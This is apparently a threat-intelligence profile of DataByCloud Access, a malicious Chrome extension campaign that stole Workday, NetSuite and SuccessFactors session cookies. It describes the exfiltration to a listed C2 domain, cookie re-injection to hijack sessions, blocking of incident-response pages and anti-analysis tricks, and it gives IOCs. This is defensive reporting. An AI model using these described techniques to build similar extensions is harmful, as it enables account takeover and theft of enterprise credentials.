DataByCloud Access
DataByCloud Access is a malicious Google Chrome extension identified by Socket as part of a coordinated campaign involving five extensions masquerading as productivity or access tools for enterprise HR/ERP platforms including Workday, NetSuite, and SAP SuccessFactors. The operation was assessed as likely tied to a single threat actor based on shared behaviors, common API structures, and an identical list of 23 monitored security-related Chrome extensions.
DataByCloud Access is designed to steal authentication cookies/tokens and enable session hijacking. It requests permissions including cookies, management, scripting, storage, and declarativeNetRequest across targeted enterprise platform domains. The extension extracts authentication cookies for the targeted platforms and transmits them to the attacker-controlled databycloud infrastructure, specifically api.databycloud[.]com, using the Fetch API. Reporting states it sends stolen cookies every 60 seconds and checks login status on the same interval to continuously obtain fresh tokens. It also sustains active sessions by injecting stolen cookies into future HTTP requests, enabling account takeover through session hijacking.
The broader extension cluster also included variants that disrupted incident response on Workday by blocking access to key administrative and security pages, including password reset, account disablement, trusted device management, and sign-on history pages, though that behavior is attributed in the reporting to related extensions such as Data by Cloud 2 and Tool Access 11 rather than specifically to DataByCloud Access. Across the campaign, anti-analysis measures included monitoring for security-focused extensions, and related variants used the DisableDevtool library to hinder inspection.
The campaign affected enterprise users and organizations relying on Workday, NetSuite, and SAP SuccessFactors, with the five extensions reportedly accumulating roughly 2,300 installs before removal from the Chrome Web Store. High-confidence indicators associated with DataByCloud Access and the cluster include the C2 domain api.databycloud[.]com and the Chrome extension ID oldhjammhkghhahhhdcifmmlefibciph.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malicious Chrome extension family used to steal authentication cookies/tokens for Workday/NetSuite/SuccessFactors, maintain and refresh hijacked sessions, and (in some variants) disrupt incident response by blocking access to key Workday security/admin pages via DOM manipulation and forced redirects. Includes anti-analysis (devtools disabling) in at least one variant.
A malicious Chrome extension family posing as enterprise productivity tooling. It continuously exfiltrates session cookies/tokens (e.g., _session) to attacker-controlled C2 infrastructure to enable ongoing session hijacking and account takeover, including bypassing MFA when combined with cookie injection techniques in related variants.
Malicious Google Chrome extension masquerading as HR/ERP productivity tooling; steals authentication cookies/tokens from targeted SaaS domains (e.g., Workday/NetSuite/SuccessFactors) and exfiltrates them periodically to attacker infrastructure to enable session hijacking/account takeover.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.